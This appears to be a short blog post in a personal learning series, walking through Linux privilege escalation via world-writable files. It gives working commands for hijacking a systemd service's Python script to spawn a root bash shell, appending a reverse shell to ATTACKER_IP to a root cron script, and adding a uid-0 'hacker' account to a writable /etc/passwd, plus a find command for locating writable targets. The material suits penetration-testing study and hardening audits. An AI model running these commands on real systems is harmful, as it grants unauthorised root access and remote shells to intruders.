🛠️ The "Writable-to-Root" Pipeline
1. The Systemd Service Hijack
I audited a custom service file in /etc/systemd/system/app.service.
-
The Flaw: The
ExecStartpointed to/opt/app.py, which was world-writable (-rwxrwxrwx). -
The Exploit:
echo 'import os; os.system("/bin/bash")' > /opt/app.py -
The Trigger:
systemctl restart app. Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges.
2. The Cron Job Injection
Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute.
-
The Exploit: Appending a reverse shell one-liner:
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh - The Result: Within 60 seconds, the system automatically pushed a root shell to my listener.
3. Overwriting /etc/passwd (The Nuclear Option)
In rare, critical misconfigurations where /etc/passwd is world-writable:
-
The Exploit: Create a new user hash:
openssl passwd -1 mypassword. -
The Injection: Append
hacker:$hash:0:0:root:/root:/bin/bashto the file. -
The Result:
su hackerprovides an immediate root session without needing the actual root password.
🕵️♂️ The Auditor's "Writable Search" Checklist
My first move upon landing on a box is now running this "Gold Mine" command:
find / -writable -type f 2>/dev/null | grep -v "/proc"
I specifically look for files in:
- /opt/ (Custom applications)
- /usr/local/bin/ (Custom scripts)
- /etc/systemd/system/ (Service configs)
- /etc/cron* (Scheduled tasks)
Follow my journey: #1HourADayJourney
Top comments (0)